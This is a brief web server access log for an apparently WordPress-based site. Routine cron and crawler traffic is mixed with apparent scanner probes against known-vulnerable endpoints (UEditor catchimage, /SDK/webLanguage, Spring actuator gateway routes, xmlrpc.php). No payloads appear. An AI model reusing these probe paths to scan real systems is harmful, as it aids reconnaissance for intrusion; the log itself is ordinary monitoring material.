103.19.190.182 - - [10/Jan/2026:18:11:01 +0800] "GET /ueditor/net/controller.ashx?action=catchimage HTTP/1.1" 404 8975 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
193.142.147.209 - - [10/Jan/2026:18:11:27 +0800] "POST / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
52.167.144.216 - - [10/Jan/2026:18:11:49 +0800] "GET /about/ HTTP/1.1" 200 30020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:18:16:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768040213.4309580326080322265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
89.42.231.200 - - [10/Jan/2026:18:16:53 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Jan/2026:18:18:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768040307.3710598945617675781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
79.124.40.174 - - [10/Jan/2026:18:18:27 +0800] "GET /actuator/gateway/routes HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:18:28:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768040893.3770949840545654296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
148.113.5.85 - - [10/Jan/2026:18:28:13 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
36.133.115.36 - - [10/Jan/2026:18:44:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768041882.3005990982055664062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
101.42.46.71 - - [10/Jan/2026:18:44:42 +0800] "GET / HTTP/1.1" 200 34274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Jan/2026:18:45:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768041910.9985899925231933593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
147.185.133.241 - - [10/Jan/2026:18:45:11 +0800] "GET / HTTP/1.1" 200 34275 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [10/Jan/2026:18:55:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768042548.3767910003662109375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.157.180.116 - - [10/Jan/2026:18:55:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
